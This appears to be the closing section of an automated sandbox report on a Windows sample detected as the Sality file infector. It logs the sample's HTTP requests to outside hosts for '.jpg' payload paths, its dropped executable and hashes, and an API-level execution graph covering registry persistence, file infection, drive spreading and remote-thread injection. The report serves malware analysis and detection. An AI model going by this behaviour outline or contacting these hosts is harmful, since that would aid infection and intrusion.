                              Set-Cookie: btst=23c464339208da2a95574fbd506ebd72|8.46.123.33|1720159209|1720159204|2|2|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              7192.168.2.64972244.221.84.105805352C:\Users\user\Desktop\1.0.0.2.exe
                              TimestampBytes transferredDirectionData
                              Jul 5, 2024 08:00:09.880390882 CEST298OUTGET /xs.jpg?c12b4b=126595310 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: arthur.niria.biz
                              Cache-Control: no-cache
                              Cookie: snkz=8.46.123.33; btst=f61c3ab837e78a3dbee4d750570963c6|8.46.123.33|1720159205|1720159205|0|1|0
                              Jul 5, 2024 08:00:10.366055965 CEST585INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Fri, 05 Jul 2024 06:00:10 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                              Set-Cookie: btst=f61c3ab837e78a3dbee4d750570963c6|8.46.123.33|1720159210|1720159205|2|2|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              8192.168.2.64972344.221.84.105805352C:\Users\user\Desktop\1.0.0.2.exe
                              TimestampBytes transferredDirectionData
                              Jul 5, 2024 08:00:10.394244909 CEST301OUTGET /images/xs.jpg?ce2fff=121614327 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: apple-pie.in
                              Cache-Control: no-cache
                              Cookie: btst=a1590c081175a697dce15a514e641dbf|8.46.123.33|1720159206|1720159206|0|1|0; snkz=8.46.123.33
                              Jul 5, 2024 08:00:10.894288063 CEST333INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Fri, 05 Jul 2024 06:00:10 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: close
                              Set-Cookie: btst=a1590c081175a697dce15a514e641dbf|8.46.123.33|1720159210|1720159206|2|2|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                              Data Raw: 30 0d 0a 0d 0a
                              Data Ascii: 0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              9192.168.2.64972578.46.2.155805352C:\Users\user\Desktop\1.0.0.2.exe
                              TimestampBytes transferredDirectionData
                              Jul 5, 2024 08:00:10.955809116 CEST188OUTGET /xs.jpg?e14213=73812575 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: ahmediye.net
                              Cache-Control: no-cache
                              Jul 5, 2024 08:00:11.618431091 CEST403INHTTP/1.1 404 Not Found
                              Date: Fri, 05 Jul 2024 06:00:11 GMT
                              Server: Apache
                              Content-Length: 258
                              Content-Type: text/html; charset=iso-8859-1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 68 6d 65 64 69 79 65 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              10192.168.2.64972637.230.104.89805352C:\Users\user\Desktop\1.0.0.2.exe
                              TimestampBytes transferredDirectionData
                              Jul 5, 2024 08:00:11.733848095 CEST202OUTGET /images/xs2.jpg?f4c967=160423430 HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                              Host: ampyazilim.com.tr
                              Cache-Control: no-cache
                              Jul 5, 2024 08:00:12.479939938 CEST933INHTTP/1.1 301 Moved Permanently
                              Connection: Keep-Alive
                              Keep-Alive: timeout=5, max=100
                              content-type: text/html
                              content-length: 707
                              date: Fri, 05 Jul 2024 06:00:12 GMT
                              location: http://ampyazilim.com.tr/images/xs2.jpg?1
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 [TRUNCATED]
                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:02:00:00
                              Start date:05/07/2024
                              Path:C:\Users\user\Desktop\1.0.0.2.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\1.0.0.2.exe"
                              Imagebase:0x400000
                              File size:5'242'880 bytes
                              MD5 hash:AD809738E208D99A28009023546BC695
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Sality, Description: Yara detected Sality, Source: 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:2
                              Start time:02:00:00
                              Start date:05/07/2024
                              Path:C:\Users\user\AppData\Local\Temp\rksowY.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Users\user\AppData\Local\Temp\rksowY.exe
                              Imagebase:0x5b0000
                              File size:15'872 bytes
                              MD5 hash:56B2C3810DBA2E939A8BB9FA36D3CF96
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 100%, ReversingLabs
                              Reputation:moderate
                              Has exited:true

                              General

                              Target ID:3
                              Start time:02:00:00
                              Start date:05/07/2024
                              Path:C:\Windows\System32\fontdrvhost.exe
                              Wow64 process (32bit):false
                              Commandline:"fontdrvhost.exe"
                              Imagebase:0x7ff7d9200000
                              File size:827'408 bytes
                              MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:false

                              General

                              Target ID:6
                              Start time:02:00:01
                              Start date:05/07/2024
                              Path:C:\Windows\System32\fontdrvhost.exe
                              Wow64 process (32bit):false
                              Commandline:"fontdrvhost.exe"
                              Imagebase:0x7ff7d9200000
                              File size:827'408 bytes
                              MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:false

                              General

                              Target ID:7
                              Start time:02:00:01
                              Start date:05/07/2024
                              Path:C:\Windows\System32\dwm.exe
                              Wow64 process (32bit):false
                              Commandline:"dwm.exe"
                              Imagebase:0x7ff68eb30000
                              File size:94'720 bytes
                              MD5 hash:5C27608411832C5B39BA04E33D53536C
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:false

                              General

                              Target ID:13
                              Start time:02:00:08
                              Start date:05/07/2024
                              Path:C:\Windows\SysWOW64\WerFault.exe
                              Wow64 process (32bit):true
                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1328
                              Imagebase:0x970000
                              File size:483'680 bytes
                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Disassembly

                              Reset < >

                                Execution Graph

                                Execution Coverage:21.2%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:23%
                                Total number of Nodes:508
                                Total number of Limit Nodes:37
                                execution_graph 7299 2b63536 7301 2b63543 7299->7301 7300 2b637ab 7301->7300 7302 2b637b3 7301->7302 7307 2b63696 7301->7307 7303 2b637bf 7302->7303 7306 2b6380e 7302->7306 7304 2b62745 2 API calls 7303->7304 7304->7300 7305 2b6385a 7308 2b638b7 7305->7308 7309 2b6386b 7305->7309 7306->7300 7306->7305 7314 2b62399 4 API calls 7306->7314 7310 2b62fa0 9 API calls 7307->7310 7312 2b62745 2 API calls 7308->7312 7311 2b62745 2 API calls 7309->7311 7313 2b63706 7310->7313 7311->7300 7312->7300 7315 2b6372f 7313->7315 7316 2b6370d 7313->7316 7314->7305 7318 2b62745 2 API calls 7315->7318 7317 2b62745 2 API calls 7316->7317 7319 2b63724 7317->7319 7318->7319 7319->7300 7320 2b622ec 2 API calls 7319->7320 7320->7300 6806 2b6ed35 6837 2b73600 6806->6837 6809 2b6ed67 6839 2b6e6f0 6809->6839 6814 2b610e5 6815 2b6edd8 CreateThread 6814->6815 6816 2b610e5 6815->6816 6937 2b6e507 6815->6937 6817 2b6edff CreateThread 6816->6817 6818 2b610e5 6817->6818 7002 2b63faa Sleep 6817->7002 6819 2b6ee26 CreateThread 6818->6819 6820 2b6ee4d 6819->6820 6995 2b657a0 6819->6995 6865 2b6f030 CreateFileMappingA 6820->6865 6824 2b6ef86 CreateThread 6826 2b610e5 6824->6826 6991 2b61189 6824->6991 6825 2b6ee8f 6825->6824 6885 2b67c71 6825->6885 6828 2b6efaa CreateThread 6826->6828 6829 2b610e5 6828->6829 6977 2b63911 6828->6977 6830 2b6efd1 CreateThread 6829->6830 6832 2b6eff8 6830->6832 6957 2b63d9b 6830->6957 6831 2b6f760 6 API calls 6833 2b6ef7b 6831->6833 6835 2b6f004 Sleep 6832->6835 6836 2b6f011 6832->6836 6833->6824 6834 2b6eed4 6834->6831 6835->6832 6838 2b6ed42 SetErrorMode 6837->6838 6838->6809 6840 2b6e6fd 6839->6840 6889 2b6dc56 RegOpenKeyExA 6840->6889 6844 2b6e8a0 RegOpenKeyExA 6846 2b6e8c4 RegSetValueExA 6844->6846 6847 2b6e8fc RegOpenKeyExA 6844->6847 6845 2b6e868 RegSetValueExA RegCloseKey 6845->6844 6846->6847 6850 2b6e947 6847->6850 6851 2b6e9b2 RegOpenKeyExA 6847->6851 6848 2b6e77b RegOpenKeyExA 6848->6844 6848->6845 6850->6851 6852 2b6e9da RegSetValueExA RegSetValueExA RegSetValueExA RegCloseKey 6851->6852 6853 2b6ea68 GetComputerNameA 6851->6853 6852->6853 6856 2b6ea93 CreateFileMappingA 6853->6856 6855 2b6eb09 6896 2b61b0e 6855->6896 6856->6855 6858 2b6eb13 6860 2b6eb2a 6858->6860 6912 2b659de 6858->6912 6861 2b6ed01 CharLowerA GlobalAlloc 6860->6861 6862 2b6ed2b CreateThread 6861->6862 6863 2b610e5 6862->6863 6984 2b6d570 GlobalAlloc 6862->6984 6864 2b610fb CreateThread 6863->6864 6864->6814 6970 2b653b2 6864->6970 6866 2b6f07c MapViewOfFile 6865->6866 6867 2b6ee82 6865->6867 6866->6867 6868 2b6f760 6867->6868 6869 2b6f7f1 6868->6869 6880 2b6f7fd 6868->6880 6870 2b6f814 GetUserNameA 6869->6870 6869->6880 6871 2b6f83d 6870->6871 6872 2b6f8dc RegOpenKeyExA 6871->6872 6876 2b6f900 6872->6876 6873 2b6f94b RegEnumValueA 6877 2b6f937 6873->6877 6884 2b6f984 6873->6884 6874 2b6fb29 6875 2b6fa11 6874->6875 6879 2b6fb76 6874->6879 6878 2b6fcce RegCloseKey 6875->6878 6875->6880 6876->6874 6876->6877 6876->6880 6877->6873 6877->6884 6878->6880 6881 2b6fbcf RegQueryValueExA 6879->6881 6882 2b6fc10 6879->6882 6880->6825 6881->6882 6883 2b6fade RegSetValueExA 6883->6884 6884->6875 6884->6882 6884->6883 6886 2b67c8e 6885->6886 6887 2b67cb7 6885->6887 6886->6887 6888 2b67c97 MapViewOfFile 6886->6888 6887->6834 6888->6887 6890 2b6dca7 RegSetValueExA RegCloseKey 6889->6890 6892 2b6dcde 6889->6892 6890->6892 6893 2b6dd25 6892->6893 6917 2b6dbcc RegOpenKeyExA 6892->6917 6894 2b6dd94 LoadLibraryA 6893->6894 6895 2b6dbcc 4 API calls 6893->6895 6894->6848 6895->6893 6897 2b61b38 6896->6897 6898 2b61bdc GetUserNameA 6897->6898 6910 2b61bbe 6897->6910 6899 2b61c05 6898->6899 6900 2b61cd8 RegOpenKeyExA 6899->6900 6901 2b61d03 RegCreateKeyA 6900->6901 6909 2b61d9b 6900->6909 6902 2b61d2c GlobalAlloc 6901->6902 6901->6910 6903 2b67c71 MapViewOfFile 6902->6903 6904 2b61d4b 6903->6904 6905 2b61d63 6904->6905 6922 2b62399 6904->6922 6908 2b61ecf 6905->6908 6905->6909 6907 2b61f44 GlobalFree 6907->6910 6908->6907 6908->6910 6909->6910 6911 2b62399 4 API calls 6909->6911 6910->6858 6911->6910 6913 2b65a2a GetPrivateProfileStringA 6912->6913 6915 2b65a63 6913->6915 6914 2b65aeb 6914->6860 6915->6914 6916 2b65ac6 WritePrivateProfileStringA 6915->6916 6916->6914 6918 2b6dbf6 RegSetValueExA 6917->6918 6919 2b6dc1a RegCreateKeyA 6917->6919 6920 2b6dc18 6918->6920 6919->6920 6921 2b6dc30 RegSetValueExA 6919->6921 6920->6892 6921->6920 6924 2b623a6 6922->6924 6923 2b6244b 6923->6905 6924->6923 6926 2b61792 6924->6926 6928 2b6179f 6926->6928 6927 2b61808 6927->6923 6928->6927 6929 2b6191b RegOpenKeyExA 6928->6929 6930 2b61942 6929->6930 6930->6927 6931 2b61adf RegCloseKey 6930->6931 6935 2b6198c 6930->6935 6931->6927 6932 2b61aad RegSetValueExA 6934 2b61ada 6932->6934 6933 2b61a8a RegSetValueExA 6933->6934 6934->6923 6935->6932 6935->6933 6938 2b6e514 6937->6938 6939 2b6e54b Sleep 6938->6939 6940 2b6e558 LoadLibraryA 6938->6940 6939->6938 6942 2b6e591 GetProcAddress 6940->6942 6948 2b6e5a9 CreateThread 6940->6948 6942->6948 6944 2b610e5 6945 2b6e62a CreateThread 6944->6945 6946 2b610e5 6945->6946 7082 2b6cc39 Sleep 6945->7082 6947 2b6e651 Sleep 6946->6947 6949 2b6e685 6947->6949 6948->6944 7053 2b6dd99 6948->7053 6950 2b6e68e CreateThread 6949->6950 6951 2b6e6bc 6949->6951 6952 2b6e66b Sleep 6949->6952 6950->6949 7075 2b6ca87 6950->7075 7011 2b6c5ae 6951->7011 6952->6949 6955 2b6c5ae 16 API calls 6956 2b6e6de 6955->6956 6958 2b6f030 2 API calls 6957->6958 6959 2b63de7 6958->6959 6960 2b6f760 6 API calls 6959->6960 6961 2b63df4 6960->6961 7107 2b63d16 6961->7107 6963 2b63df9 Sleep 6965 2b63e04 6963->6965 6964 2b63f2c 6965->6964 6966 2b63e5b CreateThread 6965->6966 6967 2b63ec5 Sleep 6965->6967 6968 2b6f760 6 API calls 6965->6968 6969 2b63d16 2 API calls 6965->6969 6966->6965 7110 2b63b41 6966->7110 6967->6965 6968->6965 6969->6965 6971 2b653c1 Sleep 6970->6971 6972 2b653ce 6970->6972 6971->6972 7149 2b643ec RegOpenKeyExA 6972->7149 6975 2b643ec 5 API calls 6976 2b6540b 6975->6976 6978 2b6391e 6977->6978 6979 2b639d9 socket 6978->6979 6980 2b63a0a setsockopt bind 6979->6980 6982 2b63a05 6979->6982 6980->6982 6983 2b63a53 6980->6983 6981 2b63a60 recvfrom 6981->6983 6983->6981 6983->6982 6985 2b67c71 MapViewOfFile 6984->6985 6986 2b6d5c4 6985->6986 6987 2b6d5e1 GlobalFree 6986->6987 6988 2b6d621 6987->6988 6990 2b6d5ff 6987->6990 6990->6988 7157 2b6d2b0 6990->7157 6994 2b61194 6991->6994 6992 2b611fb 6993 2b611ee Sleep 6993->6994 6994->6992 6994->6993 7001 2b65818 6995->7001 6996 2b659cf 6997 2b6589d FindFirstFileA 6998 2b658c7 FindNextFileA 6997->6998 6997->7001 6998->7001 6999 2b65999 Sleep 6999->6998 7000 2b65719 16 API calls 7000->7001 7001->6996 7001->6997 7001->6999 7001->7000 7185 2b613e8 7002->7185 7005 2b642b8 7006 2b64291 Sleep 7009 2b6405b 7006->7009 7009->7005 7009->7006 7187 2b6b888 7009->7187 7201 2b6be89 CreateFileA 7009->7201 7209 2b6c1ef 7009->7209 7013 2b6c657 7011->7013 7012 2b6c773 7012->6955 7013->7012 7015 2b69652 7013->7015 7017 2b6967c 7015->7017 7016 2b699ed 7016->7013 7017->7016 7018 2b69a4a 7017->7018 7020 2b69a61 7017->7020 7042 2b65719 7018->7042 7020->7016 7021 2b69b13 GetFileAttributesA SetFileAttributesA 7020->7021 7022 2b69b3f CreateFileA 7021->7022 7026 2b69b33 7021->7026 7025 2b69b6a 7022->7025 7023 2b6b7d4 SetFileAttributesA 7023->7026 7028 2b6b7f8 DeleteFileA 7023->7028 7025->7023 7029 2b69bda CreateFileMappingA 7025->7029 7026->7016 7027 2b6b84d Sleep 7026->7027 7027->7016 7028->7026 7030 2b69c0f MapViewOfFile 7029->7030 7041 2b69e9a 7029->7041 7038 2b69c31 7030->7038 7030->7041 7031 2b6b724 FindCloseChangeNotification 7031->7023 7032 2b6b73e SetFilePointer SetEndOfFile 7031->7032 7035 2b6b774 SetFileTime 7032->7035 7033 2b6b6dc GlobalAlloc 7036 2b6b53c 7033->7036 7035->7023 7036->7031 7037 2b67c71 MapViewOfFile 7039 2b6ade3 7037->7039 7038->7037 7038->7041 7039->7041 7046 2b62745 7039->7046 7041->7031 7041->7033 7041->7036 7043 2b65722 7042->7043 7045 2b6572f 7042->7045 7044 2b69652 16 API calls 7043->7044 7044->7045 7045->7016 7048 2b62754 7046->7048 7047 2b627a3 7047->7041 7048->7047 7050 2b6231e 7048->7050 7051 2b6f030 2 API calls 7050->7051 7052 2b6232c 7051->7052 7052->7047 7054 2b6ddc3 7053->7054 7055 2b6de99 Sleep 7054->7055 7089 2b65be5 7055->7089 7057 2b6debf CreateFileA 7058 2b6deed WriteFile FindCloseChangeNotification 7057->7058 7059 2b6df1a 7057->7059 7058->7059 7060 2b69652 16 API calls 7059->7060 7073 2b6df43 7059->7073 7060->7059 7061 2b6e4d3 7062 2b6dc56 7 API calls 7063 2b6df9a Sleep GetLogicalDrives 7062->7063 7063->7073 7064 2b6e4c3 Sleep 7064->7073 7065 2b6e007 GetDriveTypeA 7065->7073 7066 2b6e05e CreateFileA 7067 2b6e2b0 GetFileAttributesA 7066->7067 7066->7073 7068 2b6e2f7 CreateFileA 7067->7068 7067->7073 7068->7073 7069 2b6e100 ReadFile 7069->7073 7070 2b6e400 WriteFile SetFileTime FindCloseChangeNotification SetFileAttributesA CreateFileA 7071 2b6e47e WriteFile 7070->7071 7070->7073 7072 2b6e4af SetFileAttributesA 7071->7072 7072->7073 7073->7061 7073->7062 7073->7064 7073->7065 7073->7066 7073->7067 7073->7068 7073->7069 7073->7070 7074 2b6e20d GetFileAttributesA 7073->7074 7074->7073 7076 2b6ca94 7075->7076 7077 2b6cae6 GetDriveTypeA 7076->7077 7078 2b6cb04 7077->7078 7079 2b6cb1e RtlExitUserThread 7077->7079 7091 2b6badd Sleep 7078->7091 7084 2b6cc47 7082->7084 7083 2b6cc86 7084->7083 7102 2b6cb2d 7084->7102 7087 2b6cb2d 17 API calls 7088 2b6cc76 Sleep 7087->7088 7088->7084 7090 2b65c1d 7089->7090 7090->7057 7092 2b6bb6c 7091->7092 7093 2b6bbba 7092->7093 7094 2b6bbe5 FindFirstFileA 7092->7094 7093->7079 7095 2b6bc06 FindNextFileA 7094->7095 7096 2b6bc38 Sleep 7094->7096 7095->7096 7099 2b6bc1f 7095->7099 7096->7093 7098 2b69652 16 API calls 7098->7099 7099->7095 7099->7096 7099->7098 7100 2b65719 16 API calls 7099->7100 7101 2b6badd 16 API calls 7099->7101 7100->7099 7101->7099 7103 2b6cb7b 7102->7103 7104 2b6cbd2 Sleep 7103->7104 7105 2b6cb83 RegEnumValueA 7103->7105 7106 2b69652 16 API calls 7103->7106 7104->7087 7105->7103 7105->7104 7106->7103 7108 2b6f030 2 API calls 7107->7108 7109 2b63d24 7108->7109 7109->6963 7111 2b63b4e 7110->7111 7120 2b62fa0 7111->7120 7114 2b63c68 7116 2b63c8a 7114->7116 7132 2b632dc 7114->7132 7115 2b62fa0 9 API calls 7115->7114 7119 2b63ccc 7116->7119 7136 2b62cfa 7116->7136 7121 2b73600 7120->7121 7122 2b62fad socket 7121->7122 7123 2b63021 7122->7123 7129 2b63154 7122->7129 7124 2b62745 2 API calls 7123->7124 7125 2b6303f 7124->7125 7126 2b63055 sendto 7125->7126 7125->7129 7127 2b63081 select 7126->7127 7126->7129 7127->7129 7130 2b63159 7127->7130 7129->7114 7129->7115 7129->7119 7130->7129 7131 2b62399 4 API calls 7130->7131 7131->7129 7133 2b632e9 7132->7133 7134 2b62745 2 API calls 7133->7134 7135 2b63357 7134->7135 7135->7116 7137 2b62d07 7136->7137 7138 2b62e98 7137->7138 7139 2b62745 2 API calls 7137->7139 7138->7119 7140 2b62d83 7139->7140 7140->7138 7142 2b62c7d 7140->7142 7143 2b62ca1 7142->7143 7144 2b62cea 7142->7144 7143->7144 7146 2b622ec 7143->7146 7144->7138 7147 2b6f030 2 API calls 7146->7147 7148 2b622fa 7147->7148 7148->7144 7150 2b64416 7149->7150 7151 2b644b8 7149->7151 7152 2b64424 RegEnumValueA 7150->7152 7153 2b6445b 7150->7153 7154 2b6445d RegDeleteValueA 7150->7154 7151->6975 7152->7150 7152->7153 7153->7151 7155 2b64485 RegEnumKeyExA 7153->7155 7156 2b644ec RegDeleteKeyA 7153->7156 7154->7152 7155->7151 7155->7153 7156->7155 7159 2b6d2e6 7157->7159 7158 2b6d509 7158->6990 7159->7158 7160 2b6d408 7159->7160 7164 2b6cc92 12 API calls 7159->7164 7160->7158 7161 2b6d4a5 CreateMutexA 7160->7161 7162 2b6d4d8 FindCloseChangeNotification 7160->7162 7165 2b6cc92 7160->7165 7161->7160 7162->7160 7164->7160 7169 2b6ccbc 7165->7169 7166 2b6cf69 GetTokenInformation 7167 2b6cf93 7166->7167 7184 2b6cdde 7166->7184 7172 2b6cfdb GetTokenInformation 7167->7172 7167->7184 7168 2b6d250 FindCloseChangeNotification 7170 2b6d267 7168->7170 7171 2b6ce4f LookupPrivilegeValueA AdjustTokenPrivileges 7169->7171 7178 2b6cf35 7169->7178 7169->7184 7170->7160 7173 2b6ceba 7171->7173 7171->7184 7174 2b6d00f 7172->7174 7172->7184 7176 2b6cef1 AdjustTokenPrivileges FindCloseChangeNotification 7173->7176 7173->7184 7175 2b6d06e lstrcmpiA 7174->7175 7174->7184 7177 2b6d0b0 CreateMutexA 7175->7177 7179 2b6d084 7175->7179 7176->7178 7176->7184 7177->7184 7178->7166 7178->7184 7179->7177 7180 2b6d0ca VirtualAllocEx 7179->7180 7182 2b6d102 WriteProcessMemory 7180->7182 7180->7184 7183 2b6d134 CreateRemoteThread 7182->7183 7182->7184 7183->7184 7184->7168 7184->7170 7186 2b6140c Sleep 7185->7186 7186->7009 7188 2b6b8ec 7187->7188 7189 2b6bad2 7188->7189 7190 2b6b94d InternetOpenA 7188->7190 7189->7009 7191 2b6ba58 7190->7191 7192 2b6b974 InternetOpenUrlA 7190->7192 7194 2b6baaf InternetCloseHandle 7191->7194 7195 2b6babc 7191->7195 7192->7191 7193 2b6b9a6 7192->7193 7196 2b6b9ce InternetReadFile 7193->7196 7197 2b6b9ac CreateFileA 7193->7197 7194->7195 7195->7189 7198 2b6bac5 InternetCloseHandle 7195->7198 7200 2b6b9f6 7196->7200 7197->7196 7198->7189 7199 2b6ba12 WriteFile 7199->7200 7200->7191 7200->7196 7200->7199 7202 2b6bf26 7201->7202 7203 2b6bf2d ReadFile 7201->7203 7202->7009 7205 2b6bf66 7203->7205 7206 2b6c015 SetFilePointer WriteFile SetFilePointer SetEndOfFile 7205->7206 7207 2b6c075 7206->7207 7207->7202 7208 2b6c09c DeleteFileA 7207->7208 7208->7202 7210 2b6c2a8 7209->7210 7211 2b6b888 7 API calls 7210->7211 7212 2b6c2c4 7210->7212 7213 2b6c304 7211->7213 7212->7009 7213->7212 7214 2b6b888 7 API calls 7213->7214 7215 2b6c53a 7214->7215 7215->7212 7216 2b6be89 7 API calls 7215->7216 7216->7212 7365 2b61970 7366 2b6197f 7365->7366 7367 2b61adf RegCloseKey 7366->7367 7372 2b6198c 7366->7372 7368 2b61aec 7367->7368 7369 2b61aad RegSetValueExA 7371 2b61ada 7369->7371 7370 2b61a8a RegSetValueExA 7370->7371 7372->7369 7372->7370 7352 2b6b811 7353 2b6b81b 7352->7353 7354 2b6b84d Sleep 7353->7354 7355 2b6b858 7353->7355 7354->7355 7374 2b61d7f 7375 2b61d8e 7374->7375 7376 2b61d9b 7375->7376 7378 2b61ecf 7375->7378 7377 2b61df3 7376->7377 7380 2b62399 4 API calls 7376->7380 7378->7377 7379 2b61f44 GlobalFree 7378->7379 7379->7377 7380->7377 7321 2b6d23d 7322 2b6d247 7321->7322 7323 2b6d250 FindCloseChangeNotification 7322->7323 7324 2b6d267 7322->7324 7323->7324 7242 2bebcd0 7243 2bebce8 7242->7243 7244 2bebe02 LoadLibraryA 7243->7244 7248 2bebe47 VirtualProtect VirtualProtect 7243->7248 7245 2bebe19 7244->7245 7245->7243 7247 2bebe2b GetProcAddress 7245->7247 7247->7245 7250 2bebe41 ExitProcess 7247->7250 7249 2bebeac 7248->7249 7249->7249 7251 2b6f9b9 7256 2b6f9d1 7251->7256 7252 2b6fa11 7253 2b6fcce RegCloseKey 7252->7253 7254 2b6fcdb 7252->7254 7253->7254 7255 2b6fade RegSetValueExA 7255->7256 7256->7252 7256->7255 7257 2b6fc6b 7256->7257 7257->7257 7269 2b6dfc7 7282 2b6df88 7269->7282 7270 2b6e4c3 Sleep 7270->7282 7271 2b6e007 GetDriveTypeA 7271->7282 7272 2b6e4d3 7273 2b6dc56 7 API calls 7274 2b6df9a Sleep GetLogicalDrives 